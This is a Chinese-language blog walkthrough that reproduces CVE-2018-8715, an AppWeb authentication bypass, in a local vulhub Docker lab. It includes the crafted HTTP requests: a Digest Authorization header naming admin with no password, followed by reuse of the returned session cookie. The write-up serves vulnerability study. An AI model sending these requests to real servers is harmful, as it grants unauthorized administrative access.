漏洞|CVE-2018-8715(AppWeb认证绕过漏洞)

漏洞简介 漏洞编号:CVE-2018-8715
影响版本:7.0.3之前的版本
https://www.cvedetails.com/cve/CVE-2018-8715/
漏洞产生原因:
AppWeb可以进行认证配置,其认证方式包括以下三种:

  1. basic 传统HTTP基础认证
  2. digest改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递Authorization头
  3. form 表单认证
其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为null(也就是没有传递密码参数),appweb将因为一个逻辑错误导致直接认证成功,并返回session。
漏洞复现 root权限:cd /home/guiltyfet/vulhub/appweb/CVE-2018-8715
启动环境
┌──(rootguiltyfet)-[/home/guiltyfet/vulhub/appweb/CVE-2018-8715] └─# docker-compose up -d1 ? Creating network "cve-2018-8715_default" with the default driver Pulling web (vulhub/appweb:7.0.1)... 7.0.1: Pulling from vulhub/appweb 419e7ae5bb1e: Pull complete 848839e0cd3b: Pull complete de30e8b35015: Pull complete 2e66baab3c26: Pull complete 9a1adbcb76ed: Pull complete Digest: sha256:f7dbbe93bb427774c89d55e9dca3343a15c906ef82386b693edaca7c0c922330 Status: Downloaded newer image for vulhub/appweb:7.0.1 Creating cve-2018-8715_web_1 ... done

访问本地主机ip加8080端口
漏洞|CVE-2018-8715(AppWeb认证绕过漏洞)
文章图片
将代理和burp端口修改,burp要不抓不到,端口被占用
漏洞|CVE-2018-8715(AppWeb认证绕过漏洞)
文章图片

漏洞|CVE-2018-8715(AppWeb认证绕过漏洞)
文章图片

构造请求头
GET / HTTP/1.1Host: 172.17.0.1:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,*/*; q=0.8Accept-Language: en-US,en; q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Authorization: Digest username=admin

漏洞|CVE-2018-8715(AppWeb认证绕过漏洞)
文章图片

再次构造请求头
POST http://172.17.0.1:8080/ HTTP/1.1Host: 172.17.0.1:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,*/*; q=0.8Accept-Language: en-US,en; q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1 -http-session-=1::http.session::76bb9689db658ca88d054e65eaa89351Authorization: Digest username=adminContent-Length: 14username=admin

【漏洞|CVE-2018-8715(AppWeb认证绕过漏洞)】漏洞|CVE-2018-8715(AppWeb认证绕过漏洞)
文章图片
关闭镜像
docker-compose down

    推荐阅读